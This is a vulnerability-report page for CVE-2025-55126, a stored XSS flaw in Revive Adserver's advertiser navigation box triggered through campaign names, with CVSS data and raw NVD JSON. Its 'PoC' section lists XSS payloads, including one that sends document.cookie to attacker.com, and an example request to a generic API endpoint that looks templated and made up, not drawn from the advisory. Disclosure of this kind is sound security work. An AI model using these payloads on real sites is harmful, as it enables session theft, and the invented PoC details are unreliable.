Security Vulnerability Report
CVE-2025-55126 CVSS 6.5 MEDIUM

Published: 2025-11-20 19:16:19
Last Modified: 2026-01-14 21:16:56

Description

HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:* - VULNERABLE
Affected versions of the ad platform system (the specific versions must be determined from the actual product)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-55126 Stored XSS PoC
// Target: Advertiser page navigation box
// Vector: Campaign name field

// Step 1: Create or modify a campaign with malicious payload in name field
// Payload examples:
const payloads = [
  '<script>alert(document.cookie)</script>',
  '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>',
  '<svg onload=eval(atob("YWxlcnQoJ1hTUycpOw=="))>',
  '" onfocus="alert(1)" autofocus x="',
  '<iframe src="javascript:alert(document.domain)">'
];

// Step 2: When victim visits the advertiser page, the stored script executes
// The navigation box displays the campaign name without proper sanitization

// Example HTTP request to create campaign:
/*
POST /api/campaigns/create HTTP/1.1
Host: target.com
Content-Type: application/json

{
  "name": "<script>alert(document.cookie)</script>",
  "description": "Campaign description",
  "budget": 1000
}
*/

// The malicious script will execute for all users viewing the page

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-55126", "sourceIdentifier": "[email protected]", "published": "2025-11-20T19:16:18.880", "lastModified": "2026-01-14T21:16:56.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HackerOne community member Dang Hung Vi (vidang04) has reported a stored XSS vulnerability involving the navigation box at the top of advertiser-related pages, with campaign names being the vector for the stored XSS"}, {"lang": "es", "value": "El miembro de la comunidad de HackerOne, Dang Hung Vi (vidang04), ha reportado una vulnerabilidad de XSS almacenado que involucra el cuadro de navegación en la parte superior de las páginas relacionadas con anunciantes, siendo los nombres de las campañas el vector para el XSS almacenado."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:aquaplatform:revive_adserver:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "0CF3AE99-F6AB-419A-BB38-D1CDE5B195D2"}]}]}], "references": [{"url": "https://hackerone.com/reports/3411750", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}]}}